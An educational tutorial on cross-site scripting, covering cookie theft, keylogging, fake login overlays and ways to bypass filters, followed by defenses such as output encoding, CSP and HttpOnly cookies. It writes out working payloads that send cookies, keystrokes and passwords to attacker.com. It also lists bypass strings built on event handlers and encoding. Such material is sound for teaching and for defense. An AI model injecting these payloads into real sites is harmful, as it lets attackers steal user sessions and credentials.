Advanced Exploitation and Defense Bypass Techniques of Cross-Site Scripting (XSS) Detailed Explanation
1. Knowledge Point Description
The core of XSS (Cross-Site Scripting) is to inject malicious scripts into trusted web pages. When a user visits the page, the script executes. Basic XSS is categorized into Reflected, Stored, and DOM-based. This topic will delve into advanced XSS exploitation techniques (such as cookie theft, keylogging, phishing attacks) and common defense bypass methods (like encoding obfuscation, event handler exploitation), helping to understand the complexity and key defense points in real-world attack scenarios.
2. Detailed Advanced Exploitation Techniques
Step 1: Cookie Theft
- Attack Principle: Inject a script via XSS to read the user's
document.cookieand send the data to a server controlled by the attacker. - Example Code:
<script> var img = new Image(); img.src = "http://attacker.com/steal?data=" + encodeURIComponent(document.cookie); </script> - Key Point: The attacker needs to set up a service (e.g., an HTTP server) in advance to receive the data and utilize tags like
<img>to bypass some browser Same-Origin Policy restrictions.
Step 2: Keylogging and Session Hijacking
- Implementation Method: The injected script listens for keyboard events on the page and sends the input content to the attacker.
- Example Code:
document.onkeypress = function(e) { fetch('http://attacker.com/log?key=' + e.key); }; - Extended Application: Combined with stolen cookies, attackers can simulate user sessions (provided the target site does not use HttpOnly cookies).
Step 3: DOM-based Phishing Attacks
- Technical Details: Dynamically forge a login pop-up via XSS to trick users into entering credentials.
- Example:
var fakeForm = '<div>System upgrade, please log in again: <input id="pwd" type="password"><button onclick="sendPwd()">Submit</button></div>'; document.body.innerHTML = fakeForm; function sendPwd() { let pwd = document.getElementById('pwd').value; location.href = 'http://attacker.com/phish?pwd=' + pwd; }
3. Detailed Defense Bypass Techniques
Step 1: Bypassing HTML Tag Filtering
- Scenario: If defense code filters
<script>tags, try using event attributes of other tags. - Example:
<img src=x onerror="alert(1)"> <!-- Exploit image loading error --> <svg onload="alert(1)"> <!-- SVG tag events --> - Advanced: Use Unicode encoding or mixed case (e.g.,
<ScRiPt>) to bypass simple regex filters.
Step 2: Bypassing Attribute Value Filtering
- Scenario: If quotes (
"or') are filtered, leverage JavaScript syntax features. - Example:
<img src=x onerror=alert`1`> <!-- Backticks for template strings --> <details open ontoggle=alert(1)> <!-- Exploit events that trigger without quotes -->
Step 3: Obfuscation Encoding Bypass
- Common Encodings:
- HTML Entity Encoding:
<becomes<(but if decoded and still executed, try double encoding). - JS Encoding:
alert(1)converted to\u0061\u006c\u0065\u0072\u0074(1).
- HTML Entity Encoding:
- Bypass Example:
<img src=x onerror="eval('\u0061\u006c\u0065\u0072\u0074(1)')">
4. Comprehensive Defense Strategies
- Input Filtering: Apply strict whitelist validation to user input (e.g., only allow specific HTML tags and attributes).
- Output Encoding: Choose appropriate encoding methods based on context (HTML entity encoding, JavaScript encoding, URL encoding).
- Content Security Policy (CSP): Restrict script sources via HTTP headers, for example:
Content-Security-Policy: default-src 'self'; script-src 'none' - Supplementary Measures: Set HttpOnly and SameSite attributes for cookies, use XSS filters (e.g., X-XSS-Protection).
5. Summary
Advanced XSS exploitation demonstrates an escalation from simple pop-ups to persistent attacks, while defense bypass techniques emphasize the inadequacy of relying on a single filtering mechanism. Effective protection requires a multi-layered strategy (encoding, CSP, secure development practices) and continuous vulnerability detection through automated tools (e.g., SAST/DAST).